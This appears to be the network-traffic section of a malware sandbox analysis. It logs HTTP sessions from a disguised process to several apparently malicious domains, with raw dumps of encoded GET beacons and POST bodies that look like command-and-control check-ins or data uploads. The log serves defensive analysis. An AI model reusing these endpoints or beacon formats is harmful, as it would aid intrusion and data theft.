                                                                                                                                                                              Data Ascii: ofqwOoUcMih1AqffM/1CtUlUjB2oRaoJfjmorN/P1iWo11BGiTIn3ITxJml1DQVh5tXdP/A7SJvu3dFbALSSHKDnUcJt3Ts9XAS8r/PbcuUikW3uXYJQV45iEK2omfwYLBwLT2QDAgb0bPZy5M0Cu3vBrJ69/rDdFVSnroi4OzdLIobIHOwolch76cxQ==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              52192.168.11.204981013.248.169.48806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:58:49.483393908 CET487OUTGET /a42x/?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.remedies.pro
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:58:50.627265930 CET371INHTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:58:50 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 53 3d 7a 6e 66 6d 78 56 6b 74 34 64 6a 47 6b 33 74 6d 64 79 77 74 51 74 4a 4c 4e 67 33 48 69 4b 5a 36 55 4e 4f 56 41 31 2b 51 49 69 47 45 34 35 30 31 35 35 67 72 49 6d 42 61 4f 38 39 65 6c 2b 76 36 6a 6c 49 74 44 41 6f 73 52 77 79 4e 62 6a 32 64 4b 71 36 36 53 62 37 32 63 4e 67 70 73 38 38 70 45 55 58 36 33 67 78 74 6c 53 32 66 6b 58 4e 34 58 4c 45 51 55 6c 6b 3d 26 42 69 3d 7a 4a 5f 77 36 79 50 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=znfmxVkt4djGk3tmdywtQtJLNg3HiKZ6UNOVA1+QIiGE450155grImBaO89el+v6jlItDAosRwyNbj2dKq66Sb72cNgps88pEUX63gxtlS2fkXN4XLEQUlk=&Bi=zJ_w6yPG"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              53192.168.11.2049811202.92.5.23806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:00.010648966 CET489OUTGET /fev0/?Bi=zJ_w6yPG&iS=ZsYTLU62Pg4Ji1Y4s61CDYlnLyOe/AQTsxMfn/Xy/YyeGOVtNzq5pk+0tbrPVR8P9zBOlb50dZZ9z8YaOITKi+mT6s78g50JMD8l1vaIe5uutk/kbfnPw4g= HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.thaor56.online
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:59:00.368762016 CET1289INHTTP/1.1 404 Not Found
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              content-length: 1251
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:59:00 GMT
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:00.368792057 CET181INData Raw: 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73
                                                                                                                                                                              Data Ascii: d Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              54192.168.11.204981276.223.54.146806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:08.542073965 CET767OUTPOST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 5a 74 78 75 65 35 57 6d 69 48 55 59 31 75 53 2b 47 31 6f 4a 62 6f 35 2f 54 32 4f 5a 46 2f 7a 48 58 6c 63 4b 41 64 45 52 49 6a 50 4a 75 62 46 61 65 4e 6e 64 30 59 79 64 34 57 79 76 48 62 4f 42 62 59 64 79 64 66 4c 45 50 49 62 6b 54 4b 4e 52 4f 54 6f 76 75 59 68 75 4a 41 49 75 31 5a 30 59 48 37 67 42 58 63 43 42 42 4f 61 49 34 67 6b 32 47 62 34 76 48 33 6c 36 51 46 4d 67 41 62 66 43 58 55 6e 45 5a 31 35 51 74 39 6b 51 6e 2b 48 70 6f 42 77 4d 6f 31 4d 6c 4a 65 71 75 76 56 76 4c 55 58 58 66 78 47 66 4b 67 72 6f 45 4b 79 4e 77 78 64 65 4a 4f 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQZtxue5WmiHUY1uS+G1oJbo5/T2OZF/zHXlcKAdERIjPJubFaeNnd0Yyd4WyvHbOBbYdydfLEPIbkTKNROTovuYhuJAIu1Z0YH7gBXcCBBOaI4gk2Gb4vH3l6QFMgAbfCXUnEZ15Qt9kQn+HpoBwMo1MlJequvVvLUXXfxGfKgroEKyNwxdeJOA==
                                                                                                                                                                              Jan 11, 2025 03:59:08.677784920 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              55192.168.11.204981376.223.54.14680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:11.199618101 CET787OUTPOST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 6a 48 58 45 73 4b 48 5a 51 52 4c 6a 50 4a 6d 37 46 62 42 64 6e 53 30 59 50 69 34 58 2b 76 48 62 61 42 62 61 46 79 42 34 2f 48 50 59 62 6d 4b 61 4e 45 4b 54 6f 76 75 59 68 75 4a 41 64 31 31 64 51 59 48 4c 51 42 56 34 57 43 49 75 61 4c 78 41 6b 32 4d 4c 34 72 48 33 6c 59 51 42 4e 39 41 5a 6e 43 58 55 58 45 5a 41 5a 54 34 4e 6b 73 36 4f 47 56 6f 78 64 6f 6b 57 59 57 41 4e 61 43 6e 32 66 6b 59 68 61 46 73 30 72 75 6a 34 30 32 4f 43 30 59 7a 66 66 53 54 47 49 55 56 42 73 57 4c 33 61 71 63 6b 52 4c 51 4c 59 54 4f 66 30 3d
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJjHXEsKHZQRLjPJm7FbBdnS0YPi4X+vHbaBbaFyB4/HPYbmKaNEKTovuYhuJAd11dQYHLQBV4WCIuaLxAk2ML4rH3lYQBN9AZnCXUXEZAZT4Nks6OGVoxdokWYWANaCn2fkYhaFs0ruj402OC0YzffSTGIUVBsWL3aqckRLQLYTOf0=
                                                                                                                                                                              Jan 11, 2025 03:59:11.335268021 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              56192.168.11.204981476.223.54.14680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:13.873342991 CET2578OUTPOST /98j3/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              Origin: http://www.optimismbank.xyz
                                                                                                                                                                              Referer: http://www.optimismbank.xyz/98j3/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 75 71 64 43 4b 2b 4f 2f 34 4b 6d 51 59 4e 42 75 5a 72 2b 6d 7a 6e 55 62 70 2b 53 2b 4a 56 6f 4e 62 6f 39 2f 54 7a 72 43 46 4a 72 48 58 32 6b 4b 48 34 51 52 4b 6a 50 4a 6c 37 46 57 42 64 6e 50 30 59 57 72 34 58 44 4e 48 59 69 42 5a 35 4e 79 52 4e 54 48 45 59 62 6d 58 4b 4e 51 4f 54 70 31 75 59 78 71 4a 41 4e 31 31 64 51 59 48 49 59 42 52 73 43 43 45 4f 61 49 34 67 6b 41 47 62 34 58 48 33 39 69 51 42 41 4b 41 4a 48 43 58 77 7a 45 4b 6a 78 54 6b 64 6b 55 35 4f 47 4e 6f 78 52 33 6b 57 55 30 41 4d 2b 6f 6e 30 2f 6b 4f 48 72 41 39 6c 62 6e 35 5a 67 4f 4c 78 38 56 77 34 6a 46 53 31 46 72 61 78 41 67 4b 48 44 36 57 43 63 41 44 65 4d 50 4b 66 56 58 73 4a 6c 37 32 6d 45 58 34 78 71 47 49 72 6b 2f 47 6e 73 53 48 71 35 69 74 4c 71 6d 70 63 58 45 4b 4f 70 73 6c 42 79 43 61 30 72 67 45 6f 75 4a 2b 47 45 68 45 53 33 32 30 5a 4e 30 4c 35 66 50 67 69 6d 4f 77 71 36 4a 50 39 35 49 45 56 4b 66 35 58 52 6c 62 57 38 4c 43 42 43 35 4d 47 6a 56 6e 32 45 41 47 37 6d 4d 56 6e 2f 4c 53 6c 66 6b 64 47 4d 7a 46 4a 49 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=uqdCK+O/4KmQYNBuZr+mznUbp+S+JVoNbo9/TzrCFJrHX2kKH4QRKjPJl7FWBdnP0YWr4XDNHYiBZ5NyRNTHEYbmXKNQOTp1uYxqJAN11dQYHIYBRsCCEOaI4gkAGb4XH39iQBAKAJHCXwzEKjxTkdkU5OGNoxR3kWU0AM+on0/kOHrA9lbn5ZgOLx8Vw4jFS1FraxAgKHD6WCcADeMPKfVXsJl72mEX4xqGIrk/GnsSHq5itLqmpcXEKOpslByCa0rgEouJ+GEhES320ZN0L5fPgimOwq6JP95IEVKf5XRlbW8LCBC5MGjVn2EAG7mMVn/LSlfkdGMzFJIoB+DdMUHxjAd/IrcZAFkczTrM8wJdx+XKiyhUSs1hVPWbwulxqFx+6gGkijvIkmiqLjr0dq7BW5HCesUrv3ucOspXXZB/3c8r5dyEXJ66hHWD5r81tCaYpDxmjRvo/jznd5QlP3W3WgCkpayzq3lKeLjuufb8kX+Evyfs9DvdZN2E1GrL5AnSSZO1j+a3CxOjy0eI1g3WLflByff25nPKUMckPXwtyC0z+e0l2MlazgFK24mqrKgu4zBJt/20mJR4n4kwf/OAO014VFnHnAygNqsv4mFMLZflHRe5P7ibMZJzVe3TVCMuMCUeWuY66oUSd2/zTuiTj0llxJRwJ7FvofojWrynWoD26bxcSSlZIFOZCtAk6NfZWA8JDC6uDZq1gyMV1JIenMv3tIi1B0yo4dzGVLsDXl4a+zuVBnO0RZw8xnt7XTtFA1N4/ZWRV9GIl0XR4oq6628K/8g3jnC1Ni/CTt4Buvs3rChlMKB6IEV41oWom/ClHe+SF1/jmfMLLYfnzjZ7rK7EGOtBCGyXsHxiUMkPfngf1l5A/EDz3x2egmN+Y7WsIm2DoShSQShSGG9wA242FyiERXmmQHsL93XLtd3ZZZQQpu17HxBLdxJt6JZ5BysBBFVl5b0KgNn3vXGeqgcNQ/5BNVc1f1Ln+q87a+u0UJvgY [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:59:13.873366117 CET1289OUTData Raw: 47 6f 36 57 53 63 70 69 31 75 64 75 37 6e 39 2f 48 45 64 30 70 58 44 75 71 7a 57 66 35 54 50 78 35 71 66 52 78 36 79 51 32 59 4e 79 73 56 32 66 30 4d 45 79 5a 58 44 34 53 6c 43 47 72 6a 4f 71 41 38 70 65 4c 52 63 36 38 45 6d 61 6a 51 47 58 49 54
                                                                                                                                                                              Data Ascii: Go6WScpi1udu7n9/HEd0pXDuqzWf5TPx5qfRx6yQ2YNysV2f0MEyZXD4SlCGrjOqA8peLRc68EmajQGXITwyFrCJxQGLDeZUgXEHQ/wgvb+c/xje99+IsrsNuju/CJobZGoJ7d7JDDnKl/1NoL8GTsvqKy3jgN1vIUI04OUaoe0rx7MNrRD2YDcE/lE3OL2FEFaY42kjetwTeoOjw7QscHXiuLv3HuiIlkLcHm0HmlGrcSKcY92
                                                                                                                                                                              Jan 11, 2025 03:59:13.873442888 CET4069OUTData Raw: 4b 42 53 59 5a 59 75 45 36 49 55 75 67 4c 6d 79 72 34 37 32 47 52 34 73 43 41 51 5a 45 31 4a 4f 6e 6f 6e 4e 73 64 49 32 6d 54 37 62 67 32 6e 45 52 42 43 42 64 43 52 36 55 38 69 35 70 55 4d 72 33 65 41 77 30 53 32 65 69 44 70 43 35 67 4b 74 4e 33
                                                                                                                                                                              Data Ascii: KBSYZYuE6IUugLmyr472GR4sCAQZE1JOnonNsdI2mT7bg2nERBCBdCR6U8i5pUMr3eAw0S2eiDpC5gKtN3KxmR1U9LOx6eGecFOENoBQa8iunx+MtAJpTBCVcxVDCXILaX48LlPa19vZWH06A4dyiXjKLItdiN7AM6EC7t+qCSzRIniaZgZ0OLkrOmO9nkJbF7rusaDu1JRyQ6YG69s6vijLqdV9M+vtZS8ovg7yeH4CTvdfxmj
                                                                                                                                                                              Jan 11, 2025 03:59:14.010114908 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                              content-length: 0
                                                                                                                                                                              connection: close


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              57192.168.11.204981576.223.54.14680
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:17.554754019 CET491OUTGET /98j3/?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.optimismbank.xyz
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:59:17.697875023 CET371INHTTP/1.1 200 OK
                                                                                                                                                                              content-type: text/html
                                                                                                                                                                              date: Sat, 11 Jan 2025 02:59:17 GMT
                                                                                                                                                                              content-length: 250
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 69 53 3d 6a 6f 31 69 4a 4f 6e 6a 38 75 65 47 5a 50 4a 44 66 76 79 57 6d 68 68 58 34 62 47 41 4a 6a 74 31 44 64 74 53 61 43 53 51 4c 35 76 33 55 45 59 42 45 35 56 41 54 67 6e 71 67 75 39 79 43 59 58 55 31 71 54 38 31 55 47 32 48 62 4f 4c 51 4c 42 62 5a 4e 44 6f 4a 61 71 69 57 61 67 4c 61 51 34 4d 72 70 5a 56 4a 6e 46 34 77 37 77 2f 48 4b 55 32 62 61 4f 64 45 62 34 3d 26 42 69 3d 7a 4a 5f 77 36 79 50 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?iS=jo1iJOnj8ueGZPJDfvyWmhhX4bGAJjt1DdtSaCSQL5v3UEYBE5VATgnqgu9yCYXU1qT81UG2HbOLQLBbZNDoJaqiWagLaQ4MrpZVJnF4w7w/HKU2baOdEb4=&Bi=zJ_w6yPG"}</script></head></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              58192.168.11.2049816209.74.77.10980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:22.889581919 CET761OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6e 6e 6a 4a 45 2f 79 42 66 74 61 34 77 30 36 48 34 47 72 78 65 6b 6a 6e 4a 4a 72 54 65 79 6a 46 36 48 4b 6e 73 79 4d 32 71 7a 76 70 61 76 32 6d 4d 4e 39 78 38 78 36 66 46 6e 42 54 52 59 58 61 59 51 69 65 48 4d 4f 69 2f 35 6f 38 76 4d 35 78 73 6a 43 76 41 4e 56 78 76 65 64 53 77 33 46 38 43 32 4c 62 6b 6d 6f 5a 36 63 33 63 2b 71 35 6b 44 6e 68 55 37 64 44 64 5a 63 47 67 59 6e 6c 44 43 45 58 44 72 6d 4b 37 44 68 62 73 5a 6b 77 64 36 39 43 79 52 59 51 78 33 4e 38 41 77 4f 79 49 61 73 2b 59 38 45 73 4b 5a 48 58 4f 75 4f 55 45 54 35 78 59 41 51 3d 3d
                                                                                                                                                                              Data Ascii: iS=QsQDN7O2mvjYnnjJE/yBfta4w06H4GrxekjnJJrTeyjF6HKnsyM2qzvpav2mMN9x8x6fFnBTRYXaYQieHMOi/5o8vM5xsjCvANVxvedSw3F8C2LbkmoZ6c3c+q5kDnhU7dDdZcGgYnlDCEXDrmK7DhbsZkwd69CyRYQx3N8AwOyIas+Y8EsKZHXOuOUET5xYAQ==
                                                                                                                                                                              Jan 11, 2025 03:59:23.068051100 CET533INHTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:59:22 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              59192.168.11.2049817209.74.77.10980
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:59:25.591824055 CET781OUTPOST /r3zg/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.greenthub.life
                                                                                                                                                                              Origin: http://www.greenthub.life
                                                                                                                                                                              Referer: http://www.greenthub.life/r3zg/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 51 73 51 44 4e 37 4f 32 6d 76 6a 59 6d 47 54 4a 43 59 6d 42 64 4e 61 33 70 55 36 48 33 6d 72 39 65 6c 66 6e 4a 4e 37 44 65 41 48 46 36 6a 61 6e 74 7a 4d 32 6d 54 76 70 52 50 32 6a 52 64 39 2b 38 78 33 38 46 69 68 54 52 59 44 61 59 51 79 65 48 37 69 6a 2b 70 6f 69 6b 73 35 6b 79 54 43 76 41 4e 56 78 76 65 4a 6f 77 30 31 38 44 48 37 62 6c 44 46 72 6b 73 33 66 6f 36 35 6b 4f 48 68 51 37 64 44 6a 5a 65 6a 4e 59 68 70 44 43 47 66 44 72 58 4b 34 5a 78 62 71 64 6b 78 50 32 49 76 57 49 62 41 2f 37 66 78 54 38 63 36 64 53 61 7a 43 68 32 59 75 61 55 4c 38 71 2b 74 73 52 37 77 44 64 55 2f 6b 71 58 4a 77 47 34 75 68 57 5a 67 6e 53 62 46 53 5a 4a 63 3d
